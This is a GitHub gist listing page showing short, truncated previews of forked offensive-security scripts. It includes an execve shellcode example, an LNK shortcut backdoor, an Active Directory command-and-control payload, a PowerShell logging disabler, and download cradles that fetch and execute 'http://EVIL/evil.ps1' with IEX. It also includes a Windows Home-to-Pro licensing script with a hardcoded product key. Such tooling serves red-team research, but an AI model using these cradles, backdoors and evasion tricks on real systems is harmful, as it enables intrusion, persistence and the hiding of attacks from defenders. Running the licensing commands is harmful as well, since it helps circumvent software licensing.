SkyN9ne SkyN9ne
💚
SkyN9ne
/ Win10HometoPro.cmd
Created
December 9, 2022 18:56
— forked from FadeMind/Win10HometoPro.cmd
Convert Windows 10 Home to Pro
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cscript.exe %windir%\system32\slmgr.vbs /rilc | |
| cscript.exe %windir%\system32\slmgr.vbs /upk | |
| cscript.exe %windir%\system32\slmgr.vbs /ckms | |
| cscript.exe %windir%\system32\slmgr.vbs /cpky | |
| cscript.exe %windir%\system32\slmgr.vbs /ipk VK7JG-NPHTM-C97JM-9MPGT-3V66T | |
| sc config LicenseManager start= auto & net start LicenseManager | |
| sc config wuauserv start= auto & net start wuauserv | |
| clipup -v -o -altto c:\ |
SkyN9ne
/ execve.c
Created
October 1, 2022 06:06
— forked from mgeeky/execve.c
Example of simple execve("/bin/sh", ...) shellcode, embedded in C program.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Example of simple execve('/bin/sh', ...); shellcode compiled | |
| * and embedded within C program, then compiled on 64-bit with NX bit | |
| * turned off and set executable stack. | |
| * | |
| * Compilation: | |
| * $ gcc -fno-stack-protector -z execstack execve1.c -o execve1c | |
| */ | |
| /* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Code that quickly generates a deployable .war for a PowerShell one-liner | |
| import zipfile | |
| import StringIO | |
| import sys | |
| def generatePsWar(psCmd, appName): |
SkyN9ne
/ Invoke-HostFile.ps1
Created
September 12, 2022 01:55
— forked from HarmJ0y/Invoke-HostFile.ps1
Host a single binary file without needing administrative privileges
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Invoke-HostFile { | |
| <# | |
| .SYNOPSIS | |
| Hosts a base64 string representation of a binary file or a given | |
| $FilePath on the specified $Port. Any HTTP request to the given | |
| host/port will return the binary data of the specified file. | |
| .PARAMETER Base64File | |
SkyN9ne
/ Start-FileSystemMonitor.ps1
Created
September 12, 2022 01:45
— forked from HarmJ0y/Start-FileSystemMonitor.ps1
Start-FileSystemMonitor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Start-FileSystemMonitor { | |
| <# | |
| .SYNOPSIS | |
| This function will monitor one or more file paths for any file | |
| creation, deletion, modification, or renaming events. Data including | |
| the change type, ACL for the file, etc. is output to the screen or | |
| a specified -LogFile. | |
| If -InjectShellCmd is specified, the given command is inserted into |
SkyN9ne
/ ADC2.ps1
Created
September 12, 2022 01:43
— forked from HarmJ0y/ADC2.ps1
Command and Control channel through Active Directory Object Properties
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -Version 2 | |
| function New-ADPayload { | |
| <# | |
| .SYNOPSIS | |
| Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates | |
| a one-line launcher. | |
| Author: @harmj0y |
SkyN9ne
/ LNKBackdoor.ps1
Created
September 12, 2022 01:42
— forked from HarmJ0y/LNKBackdoor.ps1
Functions to 'backdoor' .LNK files with additional functionality and enumerate all 'backdoored' .LNKs on a system.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Set-LNKBackdoor { | |
| <# | |
| .SYNOPSIS | |
| Backdoors an existing .LNK shortcut to trigger the original binary and a payload specified by | |
| -ScriptBlock or -Command. | |
| Author: @harmj0y | |
| License: BSD 3-Clause | |
| Required Dependencies: None |
SkyN9ne
/ New-SYSVOLZip.ps1
Created
September 12, 2022 00:00
— forked from HarmJ0y/New-SYSVOLZip.ps1
Compresses all of SYSVOL to a local .zip file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function New-SYSVOLZip { | |
| <# | |
| .SYNOPSIS | |
| Compresses all folders/files in SYSVOL to a .zip file. | |
| Author: Will Schroeder (@harmj0y) | |
| License: BSD 3-Clause | |
| Required Dependencies: None |
SkyN9ne
/ NukePSLogging.cpp
Created
September 11, 2022 23:48
— forked from leechristensen/NukePSLogging.cpp
Nuke PS Logging
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| void Payload() { | |
| DWORD threadId; | |
| CreateThread( | |
| NULL, // default security attributes | |
| 0, // use default stack size | |
| MyThreadFunction, // thread function name | |
| NULL, // argument to thread function | |
| 0, // use default creation flags | |
| &threadId); | |
| } |
SkyN9ne
/ DownloadCradles.ps1
Created
September 11, 2022 23:20
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |